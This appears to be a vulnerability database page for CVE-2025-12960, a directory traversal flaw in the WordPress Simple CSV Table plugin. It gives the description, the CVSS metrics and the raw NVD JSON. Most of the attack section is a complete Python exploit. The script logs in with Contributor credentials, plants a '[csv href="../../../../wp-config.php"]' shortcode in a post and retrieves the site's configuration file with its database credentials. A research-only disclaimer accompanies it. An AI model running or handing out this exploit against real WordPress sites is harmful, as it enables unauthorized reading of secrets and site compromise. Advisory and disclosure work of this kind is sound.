Security Vulnerability Report
中文
CVE-2025-12960 CVSS 6.5 MEDIUM

CVE-2025-12960

Published: 2025-12-12 09:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Simple CSV Table plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.0.1 via the `href` parameter in the `[csv]` shortcode. This is due to insufficient path validation before concatenating user-supplied input to a base directory path. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information such as database credentials and authentication keys.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Simple CSV Table插件 <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12960 PoC - WordPress Simple CSV Table Directory Traversal # Author: Security Researcher # Target: Simple CSV Table Plugin <= 1.0.1 import requests import sys from urllib.parse import quote def exploit_cve_2025_12960(target_url, wp_username, wp_password, file_path='../../../../wp-config.php'): """ Exploit for CVE-2025-12960: Simple CSV Table Plugin Directory Traversal Args: target_url: Target WordPress site URL wp_username: WordPress Contributor+ username wp_password: WordPress password file_path: Path to read (default: wp-config.php) """ # Login to WordPress login_url = f"{target_url}/wp-login.php" session = requests.Session() login_data = { 'log': wp_username, 'pwd': wp_password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } print(f"[*] Logging in to WordPress as {wp_username}...") response = session.post(login_url, data=login_data, allow_redirects=False) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Login failed!") return None print("[+] Login successful!") # Create post with malicious shortcode create_post_url = f"{target_url}/wp-admin/post-new.php" # Craft the directory traversal payload csv_shortcode = f'[csv href="{file_path}"]' post_data = { 'post_title': 'CVE-2025-12960 Test', 'post_content': csv_shortcode, 'post_status': 'draft', 'publish': 'Publish' } print(f"[*] Creating post with malicious shortcode...") response = session.post(create_post_url, data=post_data) # Extract the post URL to trigger the vulnerability if 'post=' in response.text: import re match = re.search(r'post=(\d+)', response.url) if match: post_id = match.group(1) post_url = f"{target_url}/?p={post_id}" print(f"[+] Post created! Triggering vulnerability at: {post_url}") # Request the post to trigger the shortcode vuln_response = session.get(post_url) # Check if file content is leaked if 'DB_NAME' in vuln_response.text or 'password' in vuln_response.text.lower(): print("[+] VULNERABLE! Sensitive file content leaked!") return vuln_response.text else: print("[-] File content not visible or path incorrect") return None return None if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-12960.py <target_url> <username> <password> [file_path]") print("Example: python cve-2025-12960.py http://target.com admin password ../../../../wp-config.php") sys.exit(1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] file_path = sys.argv[4] if len(sys.argv) > 4 else '../../../../wp-config.php' result = exploit_cve_2025_12960(target, username, password, file_path) if result: print("\n[+] Extracted content:") print(result[:2000])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12960", "sourceIdentifier": "[email protected]", "published": "2025-12-12T09:15:49.627", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Simple CSV Table plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.0.1 via the `href` parameter in the `[csv]` shortcode. This is due to insufficient path validation before concatenating user-supplied input to a base directory path. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information such as database credentials and authentication keys."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/simple-csv-table/tags/1.0.1/simple-csv-table.php#L71", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3403210%40simple-csv-table&new=3403210%40simple-csv-table&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4ff9abb4-2b25-4bbb-86b4-fb1ba37e122f?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.